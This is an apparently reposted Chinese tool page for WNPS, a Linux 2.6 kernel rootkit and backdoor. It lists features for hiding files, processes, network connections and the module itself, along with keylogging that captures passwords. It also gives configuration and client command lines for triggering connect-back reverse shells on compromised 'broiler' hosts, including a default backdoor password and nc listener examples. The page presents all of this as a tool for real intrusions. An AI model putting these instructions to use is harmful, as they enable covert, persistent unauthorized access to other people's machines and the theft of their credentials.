安全焦点::安全工具-wnps-0.26-beta2.tgz

导读:
  WNPS是一只工作在Linux 2.6.x平台下的rootkit+backdoor程序。
  它的意思是wnps is not poc shell,我的意图在于将它设计成一个可用于实战的linux rootkit。
  它最初的想法来自enyelkm,我对作者的开源精神深表感激。
  开发平台:
  2.6.9-5.EL
  +----------------------------------------------------------------------------------------+
  WNPS 功能特点:
  -=-=精简测试版只有文件隐藏,目录隐藏,网络连接隐藏,后门伪终端,传输加密这几个最基本的功能-=-=
  1、隐藏
  隐藏指定文件
  隐藏文件中特定的内容
  隐藏进程
  动态隐藏网络连接、进程-->用过sk的都知道什么是动态隐藏
  隐藏自身模块
  保护相关模块、进程、文件不被跟踪
  2、内核反弹后门
  即使肉鸡没有开放任何TCP UDP端口并过滤icmp包,只要肉鸡让回连,我们就可以获得shell
  跨内核平台简易安装,拿着一个wnps.ko就可以管理所有2.6内核的机器,所有要做的事情只是执行insmod wnps.ko
  完美的伪终端支持,让你用起来更顺心
  可以设置定时自动回连,即使你的肉鸡在内网的深处,也不用担心她跑路
  3、键盘记录功能
  想看看有没其他人在你的肉鸡里跳舞?这个是最好的办法,还可以通过键盘记录把别人的肉鸡给抢了,怎么抢,自己发挥想像空间吧。键盘记录功能对渗透和保护肉鸡都有相当重要的意义。键盘有两种模式,一个是密码模式,就是专门记录密码相关的了,只要触发了相关特征字符串,我们就记录下相应的内容,还有一个就是完全记录模式了,顾名思义了。
  4、模块注射
  比adore-ng更稳定的模块注射方式
  5、通讯加密
  +----------------------------------------------------------------------------------------+
  WNPS 用法:
  服务端使用说明:
  在安装之前,请先修改wnps目录下的config.h!!!
  TCP_SHELL_KEY 表示要发送的主机密码,默认为@wztshell
  HIDE_FILE 表示我们将隐藏以HIDE_FILE字符为前缀的文件
  HIDE_TASK 表示我们将隐藏以HIDE_TASK字符为前缀的进程
  HIDE_STR 表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串
  HIDE_OPEN 表示我们将隐藏文件中位于HIDE_OPEN和HIDE_CLOSE之间的内容
  HIDE_CLOSE
  主机需要能够被安装模块以及提供内核源代码。
  make;make install
  +----------------------------------------------------------------------------------------+
  客户端使用说明:
  WNPS的客户端将被设计成可以工作在linux和win平台上使用。
  1。即可以发送tcp数据报来激活shell,又能用nc来连接服务器的某一端口来发送密码,以及
  反弹ip和port。
  2。使用方法简单灵活
  注意:如果要使用nc做客户端,请先修改服务端和客户端的config.h中的
  ENCRYPT 为0。也就是不支持传输加密的功能。
  
  1).在windows平台下,可以用nc作为客户端,连接肉鸡任意开放的一个端口。
  比如:
  ./nc -vvlp 8899
  ./nc -vv target_ip 22 然后输入密码,反弹ip和port.即可在8899端口获得一个shell。
  (1).在本机的8899端口获得一个远程shell。
  @wztshell:5566
  
  (2).在192.168.75.128的5566端口获得一个远程shell。
  @wztshell:192.168.75.128:5566
  
  2).在linux平台下,即可用nc作为客户端,又可采用自带的client作为客户端,并且允许发送
  tcp数据报来激活远程shell。
  
  ./client
  optinons:
  -tcp|packet [victim port] [connect back ip] [connect back port]
  -listen [port]
  
  -listen 在本地监听某一端口
  
  -tcp 发送tcp数据报,激活远程shell
   为远程服务器地址,必须填写这个参数。
  [victim port] 为远程服务器开放的端口,默认将会自动扫描常用开放的端口,在send.h里定义。
  [connect back ip] 为你要反弹回的主机地址,默认是本机公网ip地址,必须是可以让肉鸡能够回连的地址。
  [connect back port] 为你要反弹回的主机端口,默认为8899,在config.h里定义。
  
  +----------------------------------------------------------------------------+
  你可以很灵活的来使用WNPS的client。client默认的监听端口为8899,在client/config.h中设置
  设肉鸡ip为:192.168.75.130
  注意:如果是要在client端所在的主机上获得远程shell,无须使用-listen选项!
  
  (1).在本机的8899端口上获得一个远程shell。
  ./client -tcp 192.168.75.130
  (2).向肉鸡的22端口发送数据报,然后在本机的8899端口上获得一个远程shell。
  ./client -tcp 192.168.75.130 22
  
  (3).向肉鸡的22端口发送数据报,然后在本机的5566端口上获得一个远程shell。
  ./client -tcp 192.168.75.130 22 5566
  
  (4).在192.168.75.128的8899端口上获得一个远程shell。
  先在192.168.75.128上使用:
  ./client -listen
  
  然后在client所在的主机上使用:
  ./client -tcp 192.168.75.130 192.168.75.128
  
  (5).在192.168.75.128的5566端口上获得一个远程shell。
  ./client -listen 5566
  ./client -tcp 192.168.75.130 192.168.75.128 5566
  
  (6).向肉鸡的22端口发送数据报,然后在192.168.75.128的5566端口上获得一个远程shell。
  ./client -listen 5566
  ./client -tcp 192.168.75.130 22 192.168.75.128 5566

本文转自
http://www.xfocus.net/tools/200710/1233.html
-------------------------------------------------------------------------------- 安全焦点简介 一、这个鬼地方 1、定位 全方位、非商业而且有自己独特风格的黑客及安全站点。 2、目的 a、整理和发掘网络安全、黑客方面技术文献及工具、代码。 b、发布我们——包括任何一个对安全有想法的朋友——的想法和发现,为大家提供发布文章及安全、黑客相关工具的园地。 c、结识更多有共同志向的朋友,共同研究、讨论网络安全的方方面面。 二、这帮兄弟们 alert7 生活和技术都挺扎实的家伙。 公钥 benjurry 勤奋、知识面广。 公钥 blackhole 诚实可靠小郎君! 公钥 casper 相当前卫,不拘小节。 公钥 eyas 好好学习,天天向上。 公钥 flashsky 吟诗作对、Windows编程之好手。 公钥 glacier 乍看是个人渣,细看还不如乍看。 公钥 isno 学习学习再学习。 公钥 quack 呆。 公钥 refdom 话不多。 公钥 san 神呐,救救我吧…… 公钥 stardust 生活简单,脑袋也简单。 公钥 virtualcat 热情,热心,热血…… 公钥 watercloud 一无是处,杂而无章。 公钥 wollf Wollf Omen Look Lovely Forever 公钥 xundi 老实,诚实...... 公钥 一群普普通通的家伙,来自五湖四海,不在同一公司。喜欢自由自在,生活简单,爱玩电脑,偶尔做事会出格;-)有很多梦想,有很多希望……——我们不敢自称黑客,但我们会尽力做到自由与开放。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值